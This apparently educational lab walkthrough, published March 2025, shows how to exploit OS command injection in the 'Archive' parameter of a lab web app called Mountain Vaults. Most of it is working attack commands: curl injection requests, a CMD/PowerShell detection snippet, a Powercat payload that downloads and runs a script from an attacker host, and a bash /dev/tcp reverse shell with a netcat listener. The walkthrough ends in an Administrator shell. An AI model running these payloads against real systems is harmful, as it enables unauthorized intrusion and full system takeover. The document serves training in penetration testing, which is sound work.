Published on March 20, 2025
Web applications often interact with the operating system, such as during file uploads or executing system commands. However, if a web application accepts user input directly without proper sanitization, it may be vulnerable to **OS Command Injection**. This can allow an attacker to execute arbitrary system commands.
In this example, we will examine a vulnerable web application, **Mountain Vaults**, running on http://192.168.50.189:8000. The application allows users to **clone git repositories**, but we suspect that we may be able to inject system commands.
The application allows users to enter a git clone command:
git clone https://github.com/offensive-security/exploitdb.gitAfter submitting the form, the repository is cloned successfully. However, the fact that the **exact command is displayed** in the output suggests that user input is being passed directly to the operating system.
We use **Burp Suite** to intercept the request and find that the vulnerable parameter is **Archive**. We attempt to inject commands using **curl**:
kali@kali:~$ curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archiveHowever, the application detects the injection and blocks it.
Since "git" is a valid command, we test whether adding **additional commands** is possible:
kali@kali:~$ curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archiveThe response includes **both git help output and the Windows IP configuration**, confirming that command injection is possible.
To check whether commands are executed via **CMD** or **PowerShell**, we use this detection snippet:
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShellkali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archiveThe output contains "PowerShell", confirming that injected commands run in a PowerShell environment.
We will use **Powercat**, a PowerShell alternative to Netcat, to establish a reverse shell.
kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~$ python3 -m http.server 80kali@kali:~$ nc -nvlp 4444We now use **curl** to inject a command that downloads and executes Powercat.
kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archiveLinux payload equivalent (python server is not required, only netcat listener):
git%20|%20bash+-c+'bash+-i+>%26+/dev/tcp/192.168.45.183/4444+0>%261'ckali@kali:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50325
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Documents\meteor>We now have **full system access** as the **Administrator**!
This tutorial demonstrated how to exploit an **OS Command Injection vulnerability** in a web application. By identifying the vulnerable parameter, bypassing filters, and using a reverse shell, we gained full system access. Always validate and sanitize user input to prevent such attacks.